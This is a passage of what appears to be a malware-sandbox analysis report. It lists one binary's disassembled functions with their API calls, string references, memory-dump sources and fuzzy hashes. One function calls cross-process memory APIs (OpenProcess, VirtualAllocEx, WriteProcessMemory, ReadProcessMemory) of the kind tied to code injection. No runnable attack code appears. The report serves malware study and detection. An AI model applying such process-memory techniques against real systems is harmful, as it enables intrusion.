#, xrefs: 00DADA9D
+, xrefs: 00DADA96

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 5652f9c11e5d37c7dea2133057b05638db8544b720fb32b09bf1ab4bbe26ebfa
Instruction ID: 3844bfda6a8e191e0b669b02eb800c9245b8f54a727e3abe5e3ae9c941a78746
Opcode Fuzzy Hash: 5652f9c11e5d37c7dea2133057b05638db8544b720fb32b09bf1ab4bbe26ebfa
Instruction Fuzzy Hash: 9C510CB5204246CFDF11EF68C885AEA7BB5EF26314F185051F992AB2E0D7349C86CB30

Function 00DD503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00E2DC40,?,0000000F,0000000C,00000016,00E2DC40,?), ref: 00DD507B

Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519

Part of subcall function 00D9B8A7: _memmove.LIBCMT ref: 00D9B8FB

CharUpperBuffW.USER32(?,?,00000000,?), ref: 00DD50FB

Strings

REMOVE, xrefs: 00DD50AC
THIS, xrefs: 00DD5139

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf_memmove
String ID: REMOVE$THIS
API String ID: 2528338962-776492005
Opcode ID: a0c1eaa7270528966cc602d86e488620b9e255f66eae2039992b82654c743f60
Instruction ID: 148ac7a7797d09260c6506ee1888d1691687d8ef36423a1f998293a782ebdbe2
Opcode Fuzzy Hash: a0c1eaa7270528966cc602d86e488620b9e255f66eae2039992b82654c743f60
Instruction Fuzzy Hash: 7341C274A00609AFCF00DF64D881AAEBBB5FF49304F08816AE856AB356DB30DD41CB70

Function 00DCCF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DCC9FE,?,?,00000034,00000800,?,00000034), ref: 00DD4D6B

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00DCCFC9

Part of subcall function 00DD4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DCCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00DD4D36

Part of subcall function 00DD4C65: GetWindowThreadProcessId.USER32(?,?), ref: 00DD4C90
Part of subcall function 00DD4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00DCC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00DD4CA0
Part of subcall function 00DD4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00DCC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00DD4CB6

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DCD036
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DCD083

Strings

@, xrefs: 00DCD09B

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 63f30efab4407e1c6a0f7b5d95e9bf2063bc2e86523d4db3b8b54a3ed1e2535a
Instruction ID: 165e388cb9c5f3605f15fb2e721d47e1b5f2721d2c984f52659ab636f8002fbd
Opcode Fuzzy Hash: 63f30efab4407e1c6a0f7b5d95e9bf2063bc2e86523d4db3b8b54a3ed1e2535a
Instruction Fuzzy Hash: 95413C72900219AFDB10DFA8CC81FDEB779EF49700F148099EA55B7281DA706E45DB71

Function 00DFA44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E2DBF0,00000000,?,?,?,?), ref: 00DFA4E6
GetWindowLongW.USER32 ref: 00DFA503
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DFA513

Strings

SysTreeView32, xrefs: 00DFA4B8

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 9382b5ba52b4ac3160e8890ce510381c0133b9fbb9fb0570adc2735e7c583013
Instruction ID: a3b74d2cc5849125537dd37306eb60af4ba9bb98c0baaf4a2712053e54546098
Opcode Fuzzy Hash: 9382b5ba52b4ac3160e8890ce510381c0133b9fbb9fb0570adc2735e7c583013
Instruction Fuzzy Hash: A631A071200209AFDB218F38DC45BE67B69EF49338F258714F979A32E0C770E8549B60

Function 00DFA698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00DFA74F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00DFA75D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00DFA764

Strings

msctls_updown32, xrefs: 00DFA6C9

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 6b798767c1e3fe0aae33bcaaebe1f9a66f3bb47f5db6663e97b699d8d8771b52
Instruction ID: 8299fbe0b92a6db0802b3e2da5557d9b2fa75cda02c27f3d6b361f7cec3ec6e1
Opcode Fuzzy Hash: 6b798767c1e3fe0aae33bcaaebe1f9a66f3bb47f5db6663e97b699d8d8771b52
Instruction Fuzzy Hash: 7C2151B5600209AFDB14EF68DCC1EB737ADEB4A394B094459FA05AB391CB70EC11CA71

Function 00DF97B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DF983D
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DF984D
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00DF9872

Strings

Listbox, xrefs: 00DF980A

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 043ddc205da01658ac670aff1a3e8804ecd305a3dee494bebede7c441de04610
Instruction ID: 8d40fceaf3398775400656809cca71dae8157207e4b7fba5b9c572d459178a2f
Opcode Fuzzy Hash: 043ddc205da01658ac670aff1a3e8804ecd305a3dee494bebede7c441de04610
Instruction Fuzzy Hash: 2A21C531A1025CBFDB119F54DC95FBB7BAAEF8A7A4F02C124FA04AB190C6719C1187B0

Function 00DFA217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DFA27B
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DFA290
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DFA29D

Strings

msctls_trackbar32, xrefs: 00DFA252

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 65b2eabec9ee358e7637bc55ec13aeb3dd92c2c3c30fb1618e878809490ecb66
Instruction ID: 841de412c4a06b5a383c49a7c65538ee8a0ff1c17e7a6450c50041fcabe467da
Opcode Fuzzy Hash: 65b2eabec9ee358e7637bc55ec13aeb3dd92c2c3c30fb1618e878809490ecb66
Instruction Fuzzy Hash: 201123B1200308BEEB245F65CC06FA73BA8EF89B54F028118FB49A60D0C672E811CB30

Function 00DB2F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00DB2F79
GetProcAddress.KERNEL32(00000000), ref: 00DB2F80

Strings

RoInitialize, xrefs: 00DB2F68
combase.dll, xrefs: 00DB2F74

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: c63630b84f60c5b853a6e22075689f093e5a3a8e3964083a6cde868bff39f725
Instruction ID: 756895593064fd7db40dea79e217cb4d6e456811c3e12b30180354cd4baae83d
Opcode Fuzzy Hash: c63630b84f60c5b853a6e22075689f093e5a3a8e3964083a6cde868bff39f725
Instruction Fuzzy Hash: 2AE01A746D9700AEEB145F73ED49BE53669AB05746F144424B102F50A0CBB54048DF15

Function 00DB3034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00DB2F4E), ref: 00DB304E
GetProcAddress.KERNEL32(00000000), ref: 00DB3055

Strings

combase.dll, xrefs: 00DB3049
RoUninitialize, xrefs: 00DB303D

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: ce18b96da3c273c3a7985963ba6ac226ba3bb870e1b756883bab20d7892b6b2c
Instruction ID: 2b4b85f2160652395323c3b577f341a14279ffcb2bf36d1cb2663927036b2302
Opcode Fuzzy Hash: ce18b96da3c273c3a7985963ba6ac226ba3bb870e1b756883bab20d7892b6b2c
Instruction Fuzzy Hash: 74E0B67468A700EFEB249F73EE0DB853A69BB00722F140824F51AF10B0DBB84548DB16

Function 00E0BA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00E0BA58
__swprintf.LIBCMT ref: 00E0BA8C

Strings

%.3d, xrefs: 00E0BA66
WIN_XPe, xrefs: 00E0BACB

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: dabc748242b2f3f8c147a7acc99e7f5a21e833639aade334985f35b9daf8ddf9
Instruction ID: adff6a1442ff8d816393a60ab766c4a92d74f5580eaf2cac1be2efab4fb94995
Opcode Fuzzy Hash: dabc748242b2f3f8c147a7acc99e7f5a21e833639aade334985f35b9daf8ddf9
Instruction Fuzzy Hash: B8E01271D0811CFACB14CA919C06DFA73BCBB08340F109492B966F2094D3359B98AB31

Function 00DF20F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00DF20EC,?,00DF22E0), ref: 00DF2104
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00DF2116

Strings

GetProcessId, xrefs: 00DF2110
kernel32.dll, xrefs: 00DF20FF

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: d5ae28b88fbe33abc8283d8b3ce3db9376035f79e9c690a9d0ebad117897a385
Instruction ID: 9e2e277099b5b0bb331ffdabfd34af3ffa7c30eb87d4e3452e92eb941bdf34b0
Opcode Fuzzy Hash: d5ae28b88fbe33abc8283d8b3ce3db9376035f79e9c690a9d0ebad117897a385
Instruction Fuzzy Hash: 8ED0A774604312AFD7205F62FC0E66237E8EF04300B05D41DE74AF1154D770C480CA20

Function 00DAE6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00DAE6D9,?,00DAE55B,00E2DC28,?,?), ref: 00DAE6F1
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00DAE703

Strings

IsWow64Process, xrefs: 00DAE6FD
kernel32.dll, xrefs: 00DAE6EC

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: IsWow64Process$kernel32.dll
API String ID: 2574300362-3024904723
Opcode ID: cde2de302894e9447e96f67effcb2b5706cd972b107e75d68953fa0e91bbd4b2
Instruction ID: 9207f964dfea8d80812af96a5505126c21d08b980cbde045316b4dbb0e985b35
Opcode Fuzzy Hash: cde2de302894e9447e96f67effcb2b5706cd972b107e75d68953fa0e91bbd4b2
Instruction Fuzzy Hash: 76D0A974A04322AFD7242F22FC4C6833BE8BF05300B04A42EF596F2250DBB0C884CA20

Function 00DAE6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00DAE69C,75570AE0,00DAE5AC,00E2DC28,?,?), ref: 00DAE6B4
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DAE6C6

Strings

GetNativeSystemInfo, xrefs: 00DAE6C0
kernel32.dll, xrefs: 00DAE6AF

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 8b5c77fe3a75d903caa7595d9ea1ab41264fbb37789a1b52583a222529ef9d07
Instruction ID: ed714945ff75a00fe78e8f0677a8b095ab47537bf86ee3ad0717530920fb7350
Opcode Fuzzy Hash: 8b5c77fe3a75d903caa7595d9ea1ab41264fbb37789a1b52583a222529ef9d07
Instruction Fuzzy Hash: D3D0A7745443129FD7216F32FC0864237D4AFA8305B08AC1DF546F1160D770C480C620

Function 00DEEBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00DEEBAF,?,00DEEAAC), ref: 00DEEBC7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00DEEBD9

Strings

GetSystemWow64DirectoryW, xrefs: 00DEEBD3
kernel32.dll, xrefs: 00DEEBC2

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: ce29fc7d16ad69d69e785dadc64e51f4299328910679036135e20d0a0e3af771
Instruction ID: b3cca4edc24f3b2b9d0cc486e6f18a6629b6491f001a8637b7e6e28a9e1ec6d4
Opcode Fuzzy Hash: ce29fc7d16ad69d69e785dadc64e51f4299328910679036135e20d0a0e3af771
Instruction Fuzzy Hash: 84D0A7746083129FD7206F33FC48B4537D4AF04305B14D41DF457F1260DB70D8808620

Function 00DD13A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00DD1371,?,00DD1519), ref: 00DD13B4
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00DD13C6

Strings

oleaut32.dll, xrefs: 00DD13AF
UnRegisterTypeLibForUser, xrefs: 00DD13C0

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: a23baded644f2a5e4864b6d6039686d1fb339059226094ac0a7961f20ffdd357
Instruction ID: 2174f84bed1a96525190699eff73569eea6a0e4d4c3e2b66b4017d491a226161
Opcode Fuzzy Hash: a23baded644f2a5e4864b6d6039686d1fb339059226094ac0a7961f20ffdd357
Instruction Fuzzy Hash: 78D0A734604312BFD7344F35FC0864137E9EB40304F04941EE556F1660DA70C8848720

Function 00DD137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,00DD135F,?,00DD1440), ref: 00DD1389
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00DD139B

Strings

oleaut32.dll, xrefs: 00DD1384
RegisterTypeLibForUser, xrefs: 00DD1395

Memory Dump Source

